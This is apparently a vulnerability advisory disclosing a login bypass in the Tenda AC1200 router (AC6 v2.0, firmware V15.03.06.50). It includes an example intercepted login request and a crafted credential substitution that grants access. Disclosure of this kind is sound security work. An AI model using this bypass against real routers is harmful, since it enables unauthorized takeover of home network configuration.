Tenda AC1200 - login bypass

1. [Description]
2. Incorrect access control in Tenda AC1200 Smart Dual-Band WiFi Router
3. Model AC6 v2.0 Firmware v15.03.06.50 allows attackers to bypass
4. authentication via a crafted web request.
5.  
6. ------------------------------------------
7.  
8. [Vulnerability Type]
9. Incorrect Access Control
10.  
11. ------------------------------------------
12.  
13. [Vendor of Product]
14. Tenda
15.  
16. ------------------------------------------
17.  
18. [Affected Product Code Base]
19. Tenda AC1200 Smart Dual-Band WiFi Router Model: AC6 - AC6 v2.0 Firmware V15.03.06.50
20.  
21. ------------------------------------------
22.  
23. [Affected Component]
24. Router configuration can be changed, or other vulnerabilities can be exploited.
25.  
26. ------------------------------------------
27.  
28. [Attack Type]
29. Context-dependent
30.  
31. ------------------------------------------
32.  
33. [Impact Information Disclosure]
34. true
35.  
36. ------------------------------------------
37.  
38. [Attack Vectors]
39. Attacker must intercept the login request and change the credentials.
40.  
41. ------------------------------------------
42.  
43. [Example]
44. When the login page request is intercepted by tools like BurpSuite, we can see
45. something like that:
46. POST /login/Auth HTTP1/1
47. ...
48. username=admin&password=37a749d808e46495a8da1e5352d03cae
49.  
50. If we change username and password with "user", we will be able to login.
51.  
52. username=user&password=user
53.  
54. ------------------------------------------
55.  
56. [Discoverer]
57. Ivan Dushkov
58.  
59. ------------------------------------------